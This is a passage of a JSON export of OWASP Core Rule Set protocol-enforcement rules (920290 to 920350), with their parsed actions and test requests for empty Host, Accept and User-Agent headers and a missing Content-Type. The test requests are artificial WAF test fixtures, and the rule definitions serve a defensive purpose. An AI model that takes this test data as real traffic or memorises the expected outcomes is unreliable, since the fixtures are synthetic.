"", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 516, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 517, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 518, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 519, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 520, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 521, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 522, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 523, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 524, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 525, "act_quote": "no_quote", "act_arg": "END-HOST-CHECK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 508 } }, { "rule_id": "920290", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Host", "negated": false } ], "operator": { "type": "@rx", "argument": "^$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Empty Host Header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "%00" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920290 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920290 ] }, "malicious_patterns": [] }, { "description": "Status Page Test - test for empty host header", "test_id": 4, "request": { "method": null, "uri": "/get", "headers": {}, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920290 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 528, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Host", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^$", "actions": [ { "act_name": "id", "lineno": 529, "act_quote": "no_quote", "act_arg": "920290", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 530, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 531, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 532, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 533, "act_quote": "quotes", "act_arg": "Empty Host Header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 534, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 535, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 536, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 537, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 538, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 539, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 540, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 541, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 542, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 543, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 544, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 528 } }, { "rule_id": "920310", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Accept", "negated": false } ], "operator": { "type": "@rx", "argument": "^$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request Has an Empty Accept Header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "NOTICE", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920310 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": "OPTIONS", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920310 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920310 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 4, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920310 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 5, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent; Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0", "Host": "localhost", "Accept": "" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920310 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "OWASP CRS test agent; Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0" } ] }, { "description": "", "test_id": 6, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent; Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0", "Host": "localhost", "Accept": "" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920310 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "OWASP CRS test agent; Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 569, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Accept", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^$", "actions": [ { "act_name": "id", "lineno": 570, "act_quote": "no_quote", "act_arg": "920310", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 571, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 572, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 573, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 574, "act_quote": "quotes", "act_arg": "Request Has an Empty Accept Header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 575, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 576, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 577, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 578, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 579, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 580, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 581, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 582, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 583, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 584, "act_quote": "quotes", "act_arg": "NOTICE", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 585, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 569 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_METHOD", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^OPTIONS$", "negated": true } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 586, "variables": [ { "variable": "REQUEST_METHOD", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^OPTIONS$", "actions": [ { "act_name": "chain", "lineno": 587, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 586 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@pm", "argument": "AppleWebKit Android Business Enterprise Entreprise", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 588, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pm", "operator_argument": "AppleWebKit Android Business Enterprise Entreprise", "actions": [ { "act_name": "t", "lineno": 589, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 590, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 588 } }, { "rule_id": "920311", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Accept", "negated": false } ], "operator": { "type": "@rx", "argument": "^$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request Has an Empty Accept Header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "NOTICE", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "Host": "localhost", "Accept": "" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920311 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": "OPTIONS", "uri": "/", "headers": { "Host": "localhost", "Accept": "", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920311 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/plain, text/html" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920311 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 595, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Accept", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^$", "actions": [ { "act_name": "id", "lineno": 596, "act_quote": "no_quote", "act_arg": "920311", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 597, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 598, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 599, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 600, "act_quote": "quotes", "act_arg": "Request Has an Empty Accept Header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 601, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 602, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 603, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 604, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 605, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 606, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 607, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 608, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 609, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 610, "act_quote": "quotes", "act_arg": "NOTICE", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 611, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 595 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_METHOD", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^OPTIONS$", "negated": true } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 612, "variables": [ { "variable": "REQUEST_METHOD", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^OPTIONS$", "actions": [ { "act_name": "chain", "lineno": 613, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 612 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 614, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "t", "lineno": 615, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 616, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 614 } }, { "rule_id": "920330", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@rx", "argument": "^$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Empty User Agent Header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "NOTICE", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920330 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920330 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 629, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^$", "actions": [ { "act_name": "id", "lineno": 630, "act_quote": "no_quote", "act_arg": "920330", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 631, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 632, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 633, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 634, "act_quote": "quotes", "act_arg": "Empty User Agent Header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 635, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 636, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 637, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 638, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 639, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 640, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 641, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 642, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 643, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 644, "act_quote": "quotes", "act_arg": "NOTICE", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 645, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 629 } }, { "rule_id": "920340", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Length", "negated": false } ], "operator": { "type": "@rx", "argument": "^0$", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request Containing Content, but Missing Content-Type header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Standard POST request with \"Content-Length\" header and no \"Content-Type\" header", "test_id": 1, "request": { "method": "POST", "uri": "/pineapple", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Length": 4, "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test" }, "expected": { "should_block": true, "rule_ids": [ 920340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test" } ] }, { "description": "Standard POST request with both \"Content-Length\" and \"Content-Type\" headers", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Length": 2, "Content-Type": "application/json", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "{}" }, "expected": { "should_block": false, "rule_ids": [ 920340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{}" } ] }, { "description": "Standard GET request (negative test)", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920340 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 668, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Length", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^0$", "actions": [ { "act_name": "id", "lineno": 669, "act_quote": "no_quote", "act_arg": "920340", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 670, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 671, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 672, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 673, "act_quote": "quotes", "act_arg": "Request Containing Content, but Missing Content-Type header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 674, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 675, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 676, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 677, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 678, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 679, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 680, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 681, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 682, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 683, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 684, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 668 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 685, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "t", "lineno": 686, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 687, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 685 } }, { "rule_id": "920350", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Host", "negated": false } ], "operator": { "type": "@rx", "argument": 